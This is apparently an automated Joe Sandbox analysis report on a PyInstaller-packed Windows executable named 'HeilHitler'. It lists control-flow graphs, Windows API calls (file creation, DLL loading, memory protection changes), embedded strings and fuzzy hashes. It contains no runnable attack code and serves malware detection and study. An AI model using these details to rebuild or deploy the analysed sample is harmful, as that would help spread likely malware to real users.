7ff633d63a44-7ff633d63a47 75->80 82 7ff633d63a67 79->82 83 7ff633d63b59-7ff633d63b5d 79->83 80->79 81 7ff633d63a4d-7ff633d63a50 80->81 84 7ff633d63a56-7ff633d63a5a 81->84 85 7ff633d63b14-7ff633d63b17 81->85 86 7ff633d63a6b-7ff633d63a90 call 7ff633d74f30 82->86 83->86 84->85 89 7ff633d63a60 84->89 87 7ff633d63b19-7ff633d63b1d 85->87 88 7ff633d63b2f-7ff633d63b40 call 7ff633d62710 85->88 95 7ff633d63aab-7ff633d63ac0 86->95 96 7ff633d63a92-7ff633d63aa6 call 7ff633d68940 86->96 87->88 91 7ff633d63b1f-7ff633d63b2a 87->91 97 7ff633d63c7f-7ff633d63c87 88->97 89->82 91->86 99 7ff633d63ac6-7ff633d63aca 95->99 100 7ff633d63be8-7ff633d63bfa call 7ff633d68830 95->100 96->95 97->42 101 7ff633d63bcd-7ff633d63be2 call 7ff633d61940 99->101 102 7ff633d63ad0-7ff633d63ae8 call 7ff633d75250 99->102 108 7ff633d63bfc-7ff633d63c02 100->108 109 7ff633d63c2e 100->109 101->99 101->100 113 7ff633d63aea-7ff633d63b02 call 7ff633d75250 102->113 114 7ff633d63b62-7ff633d63b7a call 7ff633d75250 102->114 111 7ff633d63c04-7ff633d63c1c 108->111 112 7ff633d63c1e-7ff633d63c2c 108->112 115 7ff633d63c31-7ff633d63c40 call 7ff633d74f30 109->115 111->115 112->115 113->101 124 7ff633d63b08-7ff633d63b0f 113->124 122 7ff633d63b7c-7ff633d63b80 114->122 123 7ff633d63b87-7ff633d63b9f call 7ff633d75250 114->123 125 7ff633d63c46-7ff633d63c4a 115->125 126 7ff633d63d41-7ff633d63d63 call 7ff633d644e0 115->126 122->123 135 7ff633d63bac-7ff633d63bc4 call 7ff633d75250 123->135 136 7ff633d63ba1-7ff633d63ba5 123->136 124->101 128 7ff633d63cd4-7ff633d63ce6 call 7ff633d68830 125->128 129 7ff633d63c50-7ff633d63c5f call 7ff633d690e0 125->129 139 7ff633d63d65-7ff633d63d6f call 7ff633d64630 126->139 140 7ff633d63d71-7ff633d63d82 call 7ff633d61c80 126->140 146 7ff633d63ce8-7ff633d63ceb 128->146 147 7ff633d63d35-7ff633d63d3c 128->147 143 7ff633d63cb3-7ff633d63cbd call 7ff633d68660 129->143 144 7ff633d63c61 129->144 135->101 157 7ff633d63bc6 135->157 136->135 148 7ff633d63d87-7ff633d63d96 139->148 140->148 161 7ff633d63cc8-7ff633d63ccf 143->161 162 7ff633d63cbf-7ff633d63cc6 143->162 150 7ff633d63c68 call 7ff633d62710 144->150 146->147 152 7ff633d63ced-7ff633d63d10 call 7ff633d61c80 146->152 147->150 154 7ff633d63dbc-7ff633d63dd2 call 7ff633d69390 148->154 155 7ff633d63d98-7ff633d63d9f 148->155 165 7ff633d63c6d-7ff633d63c77 150->165 166 7ff633d63d2b-7ff633d63d33 call 7ff633d74f30 152->166 167 7ff633d63d12-7ff633d63d26 call 7ff633d62710 call 7ff633d74f30 152->167 172 7ff633d63dd4 154->172 173 7ff633d63de0-7ff633d63dfc SetDllDirectoryW 154->173 155->154 160 7ff633d63da1-7ff633d63da5 155->160 157->101 160->154 168 7ff633d63da7-7ff633d63db6 LoadLibraryExW 160->168 161->148 162->150 165->97 166->148 167->165 168->154 172->173 176 7ff633d63ef9-7ff633d63f00 173->176 177 7ff633d63e02-7ff633d63e11 call 7ff633d68830 173->177 179 7ff633d63f06-7ff633d63f0d 176->179 180 7ff633d64000-7ff633d64008 176->180 189 7ff633d63e2a-7ff633d63e34 call 7ff633d74f30 177->189 190 7ff633d63e13-7ff633d63e19 177->190 179->180 183 7ff633d63f13-7ff633d63f1d call 7ff633d633c0 179->183 184 7ff633d6400a-7ff633d64027 PostMessageW GetMessageW 180->184 185 7ff633d6402d-7ff633d64038 call 7ff633d636a0 call 7ff633d63360 180->185 183->165 197 7ff633d63f23-7ff633d63f37 call 7ff633d690c0 183->197 184->185 202 7ff633d6403d-7ff633d6405f call 7ff633d63670 call 7ff633d66fc0 call 7ff633d66d70 185->202 199 7ff633d63eea-7ff633d63ef4 call 7ff633d68940 189->199 200 7ff633d63e3a-7ff633d63e40 189->200 194 7ff633d63e1b-7ff633d63e23 190->194 195 7ff633d63e25-7ff633d63e27 190->195 194->195 195->189 210 7ff633d63f5c-7ff633d63f9f call 7ff633d68940 call 7ff633d689e0 call 7ff633d66fc0 call 7ff633d66d70 call 7ff633d688e0 197->210 211 7ff633d63f39-7ff633d63f56 PostMessageW GetMessageW 197->211 199->176 200->199 204 7ff633d63e46-7ff633d63e4c 200->204 208 7ff633d63e57-7ff633d63e59 204->208 209 7ff633d63e4e-7ff633d63e50 204->209 208->176 214 7ff633d63e5f-7ff633d63e7b call 7ff633d66dc0 call 7ff633d67340 208->214 213 7ff633d63e52 209->213 209->214 249 7ff633d63fed-7ff633d63ffb call 7ff633d61900 210->249 250 7ff633d63fa1-7ff633d63fb7 call 7ff633d68ed0 call 7ff633d688e0 210->250 211->210 213->176 228 7ff633d63e7d-7ff633d63e84 214->228 229 7ff633d63e86-7ff633d63e8d 214->229 233 7ff633d63ed3-7ff633d63ee8 call 7ff633d62a50 call 7ff633d66fc0 call 7ff633d66d70 228->233 230 7ff633d63ea7-7ff633d63eb1 call 7ff633d671b0 229->230 231 7ff633d63e8f-7ff633d63e9c call 7ff633d66e00 229->231 243 7ff633d63ebc-7ff633d63eca call 7ff633d674f0 230->243 244 7ff633d63eb3-7ff633d63eba 230->244 231->230 242 7ff633d63e9e-7ff633d63ea5 231->242 233->176 242->233 243->176 257 7ff633d63ecc 243->257 244->233 249->165 250->249 261 7ff633d63fb9-7ff633d63fce 250->261 257->233 262 7ff633d63fe8 call 7ff633d62a50 261->262 263 7ff633d63fd0-7ff633d63fe3 call 7ff633d62710 call 7ff633d61900 261->263 262->249 263->165
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                            • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                            • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                            • Opcode ID: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
                                                                                                                                                                                                                                            • Instruction ID: 0eb346d6c770e15e92253ca69477e5e7d831923dfad77cb800914853cad8e879
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4651f0dbc160d0404dcf25292df1705b0130bb44d3f559e05366d82f1582b67c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0432AC21A0C68291FB15DBA494573B973A1AF44780FC44236DA6DE77E6EF2CF558E300
                                                                                                                                                                                                                                            Function 00007FFDFAE8195B Relevance: 23.5, APIs: 5, Strings: 8, Instructions: 785COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                                            • API String ID: 0-352295518
                                                                                                                                                                                                                                            • Opcode ID: e537590e1e3e5565111220064509cd7ea415ff27cb0e8e47a5c26d5efe5f4d10
                                                                                                                                                                                                                                            • Instruction ID: 4b0e81c33a936e114dba6ba8a3ba8c362d7122d0e71fff0dee5fa4018bf3da85
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e537590e1e3e5565111220064509cd7ea415ff27cb0e8e47a5c26d5efe5f4d10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78728132B0874286FB68AE15D464BB937A0EB48B8CF944175DA6E4B6DCDF7ED580C700
                                                                                                                                                                                                                                            Function 00007FF633D86964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 723 7ff633d86964-7ff633d869d7 call 7ff633d86698 726 7ff633d869d9-7ff633d869e2 call 7ff633d74ee8 723->726 727 7ff633d869f1-7ff633d869fb call 7ff633d78520 723->727 732 7ff633d869e5-7ff633d869ec call 7ff633d74f08 726->732 733 7ff633d869fd-7ff633d86a14 call 7ff633d74ee8 call 7ff633d74f08 727->733 734 7ff633d86a16-7ff633d86a7f CreateFileW 727->734 747 7ff633d86d32-7ff633d86d52 732->747 733->732 735 7ff633d86afc-7ff633d86b07 GetFileType 734->735 736 7ff633d86a81-7ff633d86a87 734->736 741 7ff633d86b5a-7ff633d86b61 735->741 742 7ff633d86b09-7ff633d86b44 GetLastError call 7ff633d74e7c CloseHandle 735->742 739 7ff633d86ac9-7ff633d86af7 GetLastError call 7ff633d74e7c 736->739 740 7ff633d86a89-7ff633d86a8d 736->740 739->732 740->739 745 7ff633d86a8f-7ff633d86ac7 CreateFileW 740->745 750 7ff633d86b69-7ff633d86b6c 741->750 751 7ff633d86b63-7ff633d86b67 741->751 742->732 758 7ff633d86b4a-7ff633d86b55 call 7ff633d74f08 742->758 745->735 745->739 752 7ff633d86b72-7ff633d86bc7 call 7ff633d78438 750->752 753 7ff633d86b6e 750->753 751->752 761 7ff633d86bc9-7ff633d86bd5 call 7ff633d868a0 752->761 762 7ff633d86be6-7ff633d86c17 call 7ff633d86418 752->762 753->752 758->732 761->762 768 7ff633d86bd7 761->768 769 7ff633d86c1d-7ff633d86c5f 762->769 770 7ff633d86c19-7ff633d86c1b 762->770 773 7ff633d86bd9-7ff633d86be1 call 7ff633d7aac0 768->773 771 7ff633d86c81-7ff633d86c8c 769->771 772 7ff633d86c61-7ff633d86c65 769->772 770->773 775 7ff633d86c92-7ff633d86c96 771->775 776 7ff633d86d30 771->776 772->771 774 7ff633d86c67-7ff633d86c7c 772->774 773->747 774->771 775->776 778 7ff633d86c9c-7ff633d86ce1 CloseHandle CreateFileW 775->778 776->747 780 7ff633d86d16-7ff633d86d2b 778->780 781 7ff633d86ce3-7ff633d86d11 GetLastError call 7ff633d74e7c call 7ff633d78660 778->781 780->776 781->780
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                                            • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                            • Instruction ID: 89c632f8cecc42cd5d3a3afa7ff96505a68fc3a8e9bccf3b8a24fbe497977bd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14C1AF36B28A4585EB11CFA9C4926AC3761FB49BA8B015335DF2EAB7D4DF38E055D300
                                                                                                                                                                                                                                            Function 00007FFDFB293230 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3300690313-0
                                                                                                                                                                                                                                            • Opcode ID: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
                                                                                                                                                                                                                                            • Instruction ID: f9cd50aa36f4ee6677f142606f9a0cf833233c713b44547ec1d11bd06bff8273
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA62372272959286E7198F38D49077D77A0F748789F045632EABEC37D8EA3CEA44D700
                                                                                                                                                                                                                                            Function 00007FF633D69280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                            • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                            • Instruction ID: c398fd0573cd36a510ed8dd3cff5e559f13ae2d8f5793ff5aa1c63212eee7f96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0C832A1874186F7A08FA0B49A7667350BB84328F840335D97F567D4DF3CD058DB00
                                                                                                                                                                                                                                            Function 00007FF633D61950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 525 7ff633d61950-7ff633d6198b call 7ff633d645c0 528 7ff633d61c4e-7ff633d61c72 call 7ff633d6c550 525->528 529 7ff633d61991-7ff633d619d1 call 7ff633d67f90 525->529 534 7ff633d61c3b-7ff633d61c3e call 7ff633d7004c 529->534 535 7ff633d619d7-7ff633d619e7 call 7ff633d706d4 529->535 538 7ff633d61c43-7ff633d61c4b 534->538 540 7ff633d619e9-7ff633d61a03 call 7ff633d74f08 call 7ff633d62910 535->540 541 7ff633d61a08-7ff633d61a24 call 7ff633d7039c 535->541 538->528 540->534 547 7ff633d61a26-7ff633d61a40 call 7ff633d74f08 call 7ff633d62910 541->547 548 7ff633d61a45-7ff633d61a5a call 7ff633d74f28 541->548 547->534 554 7ff633d61a7b-7ff633d61afc call 7ff633d61c80 * 2 call 7ff633d706d4 548->554 555 7ff633d61a5c-7ff633d61a76 call 7ff633d74f08 call 7ff633d62910 548->555 567 7ff633d61b01-7ff633d61b14 call 7ff633d74f44 554->567 555->534 570 7ff633d61b16-7ff633d61b30 call 7ff633d74f08 call 7ff633d62910 567->570 571 7ff633d61b35-7ff633d61b4e call 7ff633d7039c 567->571 570->534 577 7ff633d61b6f-7ff633d61b8b call 7ff633d70110 571->577 578 7ff633d61b50-7ff633d61b6a call 7ff633d74f08 call 7ff633d62910 571->578 585 7ff633d61b8d-7ff633d61b99 call 7ff633d62710 577->585 586 7ff633d61b9e-7ff633d61bac 577->586 578->534 585->534 586->534 587 7ff633d61bb2-7ff633d61bb9 586->587 591 7ff633d61bc1-7ff633d61bc7 587->591 592 7ff633d61bc9-7ff633d61bd6 591->592 593 7ff633d61be0-7ff633d61bef 591->593 594 7ff633d61bf1-7ff633d61bfa 592->594 593->593 593->594 595 7ff633d61bfc-7ff633d61bff 594->595 596 7ff633d61c0f 594->596 595->596 597 7ff633d61c01-7ff633d61c04 595->597 598 7ff633d61c11-7ff633d61c24 596->598 597->596 599 7ff633d61c06-7ff633d61c09 597->599 600 7ff633d61c2d-7ff633d61c39 598->600 601 7ff633d61c26 598->601 599->596 602 7ff633d61c0b-7ff633d61c0d 599->602 600->534 600->591 601->600 602->598
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D67F90: _fread_nolock.LIBCMT ref: 00007FF633D6803A
                                                                                                                                                                                                                                            • _fread_nolock.LIBCMT ref: 00007FF633D61A1B
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                            • Opcode ID: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
                                                                                                                                                                                                                                            • Instruction ID: 1855953544a3383a96094cab659c93698b37e88630c9d79497d49a2ddd2127ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C81C371A0C68286EB20DBA4D0532FD73A0FF88784F844635E99DE7795DE3CE585A740
                                                                                                                                                                                                                                            Function 00007FF633D61470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                            • Opcode ID: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
                                                                                                                                                                                                                                            • Instruction ID: d4d2e6fea381ba84e704f53d4ba53531d05f7e933aa213446e06bfb832ffe5c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E241A031A0864286EB10DFA1D4125B9B3A0FF44794F844A32EDADA7B95DE3CE546A704
                                                                                                                                                                                                                                            Function 00007FF633D61210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
